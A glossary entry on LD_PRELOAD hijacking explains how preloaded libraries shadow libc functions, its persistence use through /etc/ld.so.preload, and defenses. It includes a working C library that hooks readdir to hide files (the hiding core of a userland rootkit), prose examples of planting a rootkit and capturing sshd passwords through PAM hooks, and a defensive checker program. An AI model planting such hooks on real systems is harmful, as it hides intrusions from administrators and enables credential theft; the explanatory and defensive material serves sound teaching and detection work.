LD_PRELOAD Hijacking
What is LD_PRELOAD Hijacking?
LD_PRELOAD Hijacking: Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
LD_PRELOAD hijacking (MITRE ATT&CK T1574.006, Dynamic Linker Hijacking) abuses the dynamic linker, ld.so, on Linux; most other Unix-like systems have an equivalent preload mechanism. When ld.so maps a dynamically linked program it loads the shared objects named in the LD_PRELOAD environment variable and in /etc/ld.so.preload before libc and the program's other dependencies, and because symbols are resolved in load order, a function exported by the preloaded object shadows the same-named libc function for every call the program makes. Setting LD_PRELOAD affects one command or everything launched from that shell or service; writing a path to the root-owned /etc/ld.so.preload affects every dynamically linked process started on the host from then on, which is why that variant is used for persistence. The malicious .so typically hooks libc symbols such as readdir (hide files and /proc entries, and with them processes), open and fopen (hide its own files and filter reads of /etc/ld.so.preload), accept (backdoor listening services), or write and PAM entry points (capture credentials), forwarding to the real implementation obtained with dlsym(RTLD_NEXT, ...) so the program keeps working. In secure-execution mode (setuid/setgid binaries and those with file capabilities) ld.so discards LD_PRELOAD entries containing a slash and loads the rest only from the standard library directories, so the variable alone does not reach privileged programs in practice; /etc/ld.so.preload, by contrast, is honored even for them. Statically linked binaries are unaffected by either. The technique is used by Linux malware families such as HiddenWasp and Symbiote. Defenses: treat any content in /etc/ld.so.preload as suspect and alert on its creation or modification (AIDE, an auditd watch on the path), confirm it is root-owned and not writable by others, alert on LD_PRELOAD appearing in process environments, service unit files, cron entries or shell profiles, and verify what the host reports with statically linked tools or from a rescue image, since a preloaded library can lie to dynamically linked ls, ps and cat.
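The mechanism described above, as an added example that is not code from the original page or from any malware family it names: a minimal shared object that interposes libc's readdir so that any dynamically linked program started with it in LD_PRELOAD (or listed in /etc/ld.so.preload) no longer shows directory entries beginning with a chosen prefix. The prefix hidden_, the file names libhide.so and hide.c, and the build line are assumptions made for this demo.

```c
/* Added example (not from the original page, HiddenWasp or Symbiote): a minimal
 * preload library that hides directory entries from any dynamically linked
 * program it is injected into.
 *
 * Build:  gcc -shared -fPIC -o libhide.so hide.c     (add -ldl on glibc < 2.34)
 * Use:    touch /tmp/hidden_test; LD_PRELOAD=$PWD/libhide.so ls /tmp
 * The prefix, file names and build line are assumptions made for this demo. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE                 /* exposes RTLD_NEXT in <dlfcn.h> */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <stddef.h>
#include <string.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)    /* glibc's value, in case the feature macro came too late */
#endif

/* Directory entries whose name starts with this prefix are dropped from listings. */
#define HIDE_PREFIX "hidden_"

/* Return 1 if a directory entry name should be suppressed, else 0. */
int should_hide(const char *name)
{
    if (name == NULL)
        return 0;
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* The real libc readdir(), resolved on first use from the next object in the
 * link map after this one (normally libc itself). */
static struct dirent *(*real_readdir)(DIR *) = NULL;

/* Interposed readdir(). Because ld.so searches preloaded objects before libc,
 * every readdir() call the program makes lands here; the hook forwards to the
 * real function and skips entries that match the prefix, so the program keeps
 * working and only its view of the filesystem changes. */
struct dirent *readdir(DIR *dirp)
{
    if (real_readdir == NULL) {
        real_readdir = (struct dirent *(*)(DIR *)) dlsym(RTLD_NEXT, "readdir");
        if (real_readdir == NULL)
            return NULL;            /* cannot find the real one: fail closed rather than crash */
    }
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL) {
        if (!should_hide(ent->d_name))
            break;                  /* an entry the program is allowed to see */
    }
    return ent;                     /* NULL at end of directory, as usual */
}
```

Compare `ls /tmp` with and without the LD_PRELOAD prefix after creating /tmp/hidden_test: the file still exists and `cat /tmp/hidden_test` still works, only enumeration is filtered, which is exactly what makes the technique hard to notice from inside an affected process. Programs built with _FILE_OFFSET_BITS=64 bind to readdir64 instead, so a rootkit that wants full coverage interposes that symbol with the same body; this demo hooks readdir only. Run the same command against a statically linked ls (for example a static busybox) and the hidden entry reappears, because ld.so is not involved at all.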
● Examples
- 01
Writing /usr/lib/libsel.so into /etc/ld.so.preload so every new process loads a userland rootkit.
- 02
Setting LD_PRELOAD in the environment sshd starts with (its systemd unit or init script) so a preloaded object hooks the PAM authentication calls and records the passwords they carry.
● Frequently asked questions
What is LD_PRELOAD Hijacking?
Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes. It belongs to the Attacks & Threats category of cybersecurity.
What does LD_PRELOAD Hijacking mean?
Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
How does LD_PRELOAD Hijacking work?
When ld.so starts a dynamically linked program it maps the objects named in LD_PRELOAD and /etc/ld.so.preload before libc and the program's other dependencies, so a same-named function in the preloaded object is the one every call resolves to. The attacker's object replaces libc functions such as readdir, open, accept, write or the PAM entry points with versions that filter or record data and then forward to the real function through dlsym(RTLD_NEXT, ...), so the program behaves normally apart from what is hidden or captured. LD_PRELOAD scopes the hook to one process tree and is neutered for setuid programs; /etc/ld.so.preload applies to every new process, privileged ones included, which makes it the persistence variant.
How do you defend against LD_PRELOAD Hijacking?
Treat /etc/ld.so.preload as a file that should not exist on most hosts: baseline it and alert on its creation or modification (AIDE or another file-integrity tool, an auditd watch on the path), and check that it is owned by root and not group- or world-writable. Alert when LD_PRELOAD appears in a process environment (/proc/<pid>/environ), in a systemd unit's Environment= settings, in cron entries, or in shell profile files such as /etc/profile and /etc/environment; legitimate uses (an alternative malloc, libfaketime) are rare enough to allow-list explicitly. Because a preloaded library can lie to dynamically linked ls, ps and cat, verify the host with statically linked tools or from a rescue image, and compare /proc/<pid>/maps against the libraries a process is expected to have loaded. Remember that LD_PRELOAD is ignored for setuid programs but /etc/ld.so.preload is not, so a clean environment variable says nothing about the file.
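A checker for the two artifacts named above, added here as example code rather than something from the original page or any particular product. The parsing functions take file contents as strings so they can be exercised on constructed input; main() runs them against the live /etc/ld.so.preload and every readable /proc/<pid>/environ. The sample strings, the 32-entry and 8 KiB limits, and the file name check.c are assumptions for the demo.

```c
/* Added example, not from the original page or any product: a checker for the
 * two artifacts this technique leaves behind. The parsers take file contents as
 * strings so they can be exercised on constructed input; main() runs them
 * against the live /etc/ld.so.preload and every readable /proc/<pid>/environ.
 * Build it static (gcc -static -o preloadcheck check.c) so that a preloaded
 * library cannot hook the checker's own open()/read(). Size limits are
 * arbitrary choices for the demo. */
#include <ctype.h>
#include <dirent.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 32
#define MAX_ENTRY   256

/* True if c separates list items: whitespace, or any character in extra. */
static int is_sep(char c, const char *extra)
{
    return isspace((unsigned char)c) || (c != '\0' && strchr(extra, c) != NULL);
}

/* Split a preload list into out[] and return the number of items stored.
 * /etc/ld.so.preload is documented as whitespace-separated; ld.so accepts ':'
 * as well as whitespace between LD_PRELOAD items, so pass ":" as extra there. */
int parse_preload_list(const char *text, const char *extra, char out[][MAX_ENTRY], int max)
{
    int n = 0;
    for (const char *p = text; n < max; n++) {
        while (*p != '\0' && is_sep(*p, extra))
            p++;                              /* skip leading separators */
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && !is_sep(*p, extra))
            p++;
        size_t len = (size_t)(p - start);
        if (len >= MAX_ENTRY)
            len = MAX_ENTRY - 1;              /* truncate oversized items */
        memcpy(out[n], start, len);
        out[n][len] = '\0';
    }
    return n;
}

/* Scan a /proc/<pid>/environ blob (NUL-separated KEY=VALUE strings, len bytes,
 * with blob[len] == '\0') and return LD_PRELOAD's value, or NULL if unset. */
const char *ld_preload_from_environ(const char *blob, size_t len)
{
    static const char key[] = "LD_PRELOAD=";
    const size_t klen = sizeof key - 1;
    for (size_t i = 0; i < len; ) {
        const char *entry = blob + i;
        size_t elen = strnlen(entry, len - i);
        if (elen >= klen && memcmp(entry, key, klen) == 0)
            return entry + klen;
        i += elen + 1;                        /* step past the terminating NUL */
    }
    return NULL;
}

/* Read up to cap-1 bytes of path into buf and NUL-terminate; -1 if unreadable. */
static long read_file(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t got = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[got] = '\0';
    return (long)got;
}

int main(void)
{
    char entries[MAX_ENTRIES][MAX_ENTRY], buf[8192], path[64];
    long got = read_file("/etc/ld.so.preload", buf, sizeof buf);
    if (got < 0) {
        puts("/etc/ld.so.preload: absent");
    } else {
        int n = parse_preload_list(buf, ":", entries, MAX_ENTRIES);
        printf("/etc/ld.so.preload: %d entries (any is suspicious on most hosts)\n", n);
        for (int i = 0; i < n; i++)
            printf("  %s\n", entries[i]);
    }
    /* Other users' environ files are unreadable without root and are skipped. */
    DIR *proc = opendir("/proc");
    struct dirent *e;
    while (proc != NULL && (e = readdir(proc)) != NULL) {
        if (!isdigit((unsigned char)e->d_name[0]))
            continue;                         /* not a pid directory */
        snprintf(path, sizeof path, "/proc/%s/environ", e->d_name);
        got = read_file(path, buf, sizeof buf);
        const char *v = got < 0 ? NULL : ld_preload_from_environ(buf, (size_t)got);
        if (v != NULL)
            printf("pid %s: LD_PRELOAD=%s\n", e->d_name, v);
    }
    if (proc != NULL)
        closedir(proc);
    return 0;
}
```

Run it as root to see every process's environment; as an unprivileged user it only reports your own. A preload library that hooks open() or readdir() can hide its entry from a dynamically linked copy of this checker, which is the reason for the static build and for cross-checking from a rescue image.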
What are other names for LD_PRELOAD Hijacking?
Common alternative names include: ld.so.preload abuse, Shared library hijack, and, in MITRE ATT&CK, Dynamic Linker Hijacking (T1574.006).
● Related terms
- attacks№ 331
DLL Hijacking
An attack that abuses Windows DLL search order to make a legitimate program load an attacker-controlled library instead of the intended one.
- attacks№ 238
Cron Persistence
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event.
- attacks№ 608
launchd Persistence
macOS persistence technique that installs a LaunchDaemon or LaunchAgent property list so launchd executes attacker code at boot, login, or on a trigger.
- malware№ 949
Rootkit
Stealth malware that grants and hides privileged access to an operating system or device, evading detection by standard tools.
- attacks№ 862
Process Injection
A family of evasion techniques in which an attacker runs malicious code inside the address space of a legitimate process to inherit its trust and identity.
● See also
- № 054 AppInit_DLLs